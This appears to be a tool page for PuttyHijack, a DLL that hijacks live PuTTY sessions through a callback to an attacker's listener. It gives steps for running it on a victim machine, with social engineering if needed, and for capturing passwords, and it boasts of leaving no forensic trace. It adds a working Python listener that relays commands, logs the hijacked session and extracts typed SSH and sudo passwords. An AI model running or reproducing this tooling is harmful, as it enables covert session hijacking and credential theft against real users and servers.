The injected DLL installs hooks inside the PuTTY process and opens a socket in the guest operating system for a callback connection, which is then used to redirect the session's input and output.
PuttyHijack does not kill the current PuTTY connection, and it uninjects cleanly if the callback socket or the process is stopped, leaving no trace behind for later forensic analysis.
How to run/install PuttyHijack
- Start an nc (netcat) listener on a machine you fully control.
- Run PuttyHijack on the victim machine, specifying the listener's IP address and port (some social engineering may be needed to get it run there).
- Watch everything the hijacked session echoes back, passwords included (capture it for further analysis).
- Commands understood by the injected shell:
!reco – reconnect to the listener
!exit – another way to exit the injected shell
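As an added example (not part of PuttyHijack or its original write-up), here is the listener step above done in Python instead of nc: it accepts the DLL's callback connection, forwards what the operator types (so !reco and !exit can be sent), records everything the hijacked session echoes to a log file, and then searches the transcript for values typed after a password prompt. The default port, the log format, the assumption that the DLL interleaves hooked keystrokes with the server's prompt text, and the sample transcript are all this example's own choices rather than anything the tool documents.

```python
"""Added example, not PuttyHijack's code: a Python stand-in for the nc listener.
Accepts the DLL's callback, relays operator input, logs the echoed session and
scans it for credentials (port, log format, prompt heuristic are assumptions)."""
import os
import re
import socket
import sys
import tempfile
import threading

# Constructed transcript standing in for what a hijacked PuTTY would echo.
SAMPLE_TRANSCRIPT = (
    b"login as: root\r\n"
    b"root@10.0.0.5's password: hunter2\r\n"
    b"$ sudo -i\r\n"
    b"[sudo] password for root:\r\n"
    b"s3cret!\r\n"
    b"# "
)
# Assumption: hooked keystrokes are appended to the server's prompt text.
_PW_PROMPT = re.compile(rb"[Pp]assword[^:\r\n]*:[ \t]*([^\r\n]*)")


class CallbackListener:
    """Bind once, then accept a single callback connection and record it."""

    def __init__(self, host="0.0.0.0", port=4444):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]  # real port, also when port=0

    def accept_and_record(self, log_path, stdin=None):
        """Wait for the callback, append all received bytes to log_path and
        echo them to stdout until the DLL disconnects; return the bytes.
        Lines from stdin (if given) are forwarded, so !reco / !exit work."""
        conn, peer = self.sock.accept()
        received = bytearray()

        def forward_input():
            for line in stdin:
                try:
                    conn.sendall(line.encode() if isinstance(line, str) else line)
                except OSError:
                    break

        if stdin is not None:
            threading.Thread(target=forward_input, daemon=True).start()
        with open(log_path, "ab") as log:
            log.write(b"# callback from %s:%d\n" % (peer[0].encode(), peer[1]))
            while True:
                chunk = conn.recv(4096)
                if not chunk:  # remote closed: DLL uninjected or PuTTY exited
                    break
                received += chunk
                log.write(chunk)
                log.flush()
                sys.stdout.write(chunk.decode("utf-8", "replace"))
        conn.close()
        self.sock.close()
        return bytes(received)


def find_password_entries(transcript):
    """Return (prompt, value) pairs: the value is the text after a password
    prompt on the same line, or the next line if the prompt ended the line."""
    lines = transcript.replace(b"\r\n", b"\n").split(b"\n")
    hits = []
    for i, line in enumerate(lines):
        m = _PW_PROMPT.search(line)
        if not m:
            continue
        value = m.group(1).strip()
        if not value and i + 1 < len(lines):
            value = lines[i + 1].strip()
        if value:
            hits.append((line[: m.start(1)].strip(), value))
    return hits


def run_loopback_demo(log_path=None):
    """Offline check: a loopback client plays the hijacked PuTTY and sends
    SAMPLE_TRANSCRIPT. Returns (captured bytes, credential hits)."""
    log_path = log_path or os.path.join(tempfile.mkdtemp(), "hijack.log")
    listener = CallbackListener("127.0.0.1", 0)
    box = {}
    worker = threading.Thread(
        target=lambda: box.setdefault("data", listener.accept_and_record(log_path)))
    worker.start()
    with socket.create_connection(("127.0.0.1", listener.port)) as client:
        client.sendall(SAMPLE_TRANSCRIPT)
    worker.join(10)
    return box["data"], find_password_entries(box["data"])


if __name__ == "__main__":  # usage: python hijack_listener.py [host] [port]
    lst = CallbackListener(sys.argv[1] if len(sys.argv) > 1 else "0.0.0.0",
                           int(sys.argv[2]) if len(sys.argv) > 2 else 4444)
    data = lst.accept_and_record("hijack.log", stdin=sys.stdin)
    for prompt, value in find_password_entries(data):
        print(f"credential after {prompt!r}: {value!r}")
```

Run it with the same IP and port you pass to PuttyHijack; `run_loopback_demo()` exercises the recorder offline against the constructed transcript. The prompt heuristic is deliberately loose, so review the raw log rather than trusting the extracted pairs alone.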